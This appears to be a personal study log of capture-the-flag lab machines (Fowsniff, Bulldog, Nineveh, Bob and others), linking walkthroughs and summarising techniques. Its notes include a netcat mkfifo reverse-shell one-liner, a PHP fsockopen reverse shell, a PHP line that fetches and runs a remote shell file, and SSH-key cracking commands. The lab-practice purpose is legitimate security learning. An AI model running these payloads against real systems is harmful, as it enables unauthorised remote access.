Posts

56 VM Fowsniff: 1

Notes: A. https://www.hackingarticles.in/fowsniff-1-vulnhub-walkthrough/ [IMAP and POP3 ports, access mailbox from CLI, add Python reverse shell to banner so when a user logs in, the banner runs and gets root access, Metasploit POP3 access] Walkthru:
55 VM Bulldog 1

Walkthru: A. https://medium.com/@krankoPwnz/walkthrough-for-bulldog-on-vulnhub-com-c834573e28fd [password hash in source, webshell with limited commands but use || or && to run any command, crontab, Python reverse shell for priv escalation] B. https://securitybytes.io/vulnhub-com-bulldog-ctf-solution-b00b4640327a [pwd in binary file, extract it using strings] C. https://hack-ed.net/2017/11/09/bulldog-ctf-walkthrough/ [read files from webshell] D. https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ [upgrade shell]
Notes: There was a crontab file that runs daily. I tried to add a bash reverse shell, added a user to the sudoers file, and a PHP reverse shell, but none worked. But I was able to create a file using that crontab, which led me to believe it is possible to perform escalation using it. I used the rm cmd to perform a reverse shell:
rm /tmp/f|mkfifo /tmp/f|cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.1.100 1234 >/tmp/f
nc -nvlp 1234

54 VM W1R3S: 1.0.1

Walkthru: A. https://github.com/nbrisset/CTF/tree/master/CTF-VulnLabs/w1r3s [local file inclusion, FTP, Cuppa CMS vulnerability, LFI working using CLI but not browser, john, sudo su for privilege escalation] B. https://blog.barradell-johns.com/index.php/2018/06/25/w1r3s-writeup/ [I was getting the same response from the server for LFI. Looks like it needed encoding. "After a bit of research I found I may have better luck with encoded url (url encoding) params, so I utilised cURL"]
Notes:

53 VM Basic Pentest 2

Walkthru: A. https://resources.infosecinstitute.com/basic-pentesting-2-ctf-walkthrough/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+infosecResources+%28InfoSec+Resources%29 [brute force passphrases for SSH login, convert private key to another format so we can use john to brute force the key] B. http://www.hackingarticles.in/hack-the-basic-pentesting2-vm-ctf-challenge/ [use ssh2john to convert this SSH key into a crackable file for John the Ripper.] C. https://medium.com/@nelsoncoln/basic-pentesting-2-vm-walkthrough-383047900187 [vim.basic has root permissions, that means that I could probably read the file in kay’s directory,]
Notes: [from walkthru B]
python ssh2john key > ssh_login
john ssh_login

52 VM DerpNStink: 1

Walkthru: A. http://nixware.net/derpnstink-1-walkthrough [WordPress, wpscan, WordPress vuln, access via MySQL user/pwd, hashcat, pwd in pcap file, sudo user will get you root access but the file/dir in sudo doesn't exist so you have to create one, dev reverse tcp] B. https://amonsec.net/ctf/derpnstink-1-ctf-walkthrough [use private key SSH to login]
Notes: A. Not sure how the password was cracked using hashcat. Tried a single hash but it didn't work. Another hash worked: https://samsclass.info/seminars/CMS/hashcat-wordpress.htm

48 VM HTB Nineveh

Walkthru: A. https://v3ded.github.io/ctf/htb-nineveh.html [hydra brute force www, searchsploit phpLiteAdmin 1.9, hydra brute force https where username is irrelevant but just required to complete the command, PHP reverse shell, create a database and table in phpLiteAdmin, directory traversal, chkrootkit privilege escalation bug, port knocking, strings to extract key from png file]
Notes: Unable to test it since the VM had a static IP. Read walkthru. Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content. Change database and add a table inside called shell, select 1 field: name the field whatever we wish, set it as text type, put <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?> into the default value & click create. This should create a new table with our exploit. The default

47 VM Bob 1.0.1

Walkthru: A. http://www.hackingarticles.in/hack-the-bob-1-0-1-vm-ctf-challenge/ [webshell, robots.txt, reverse shell, combining two OS commands using && and ||, hidden content/information, spawning a Python shell, SSH on non-default port, search for txt file, password in text file, gpg file where the key is the first letter of each line of a file] B. https://dangwasec.wordpress.com/2018/03/20/ctf-bob-1-0-1-walkthrough/ [burp] C. https://hackso.me/bob-1.0.1-walkthrough/ [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files; not useful here]
Notes: file notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are slee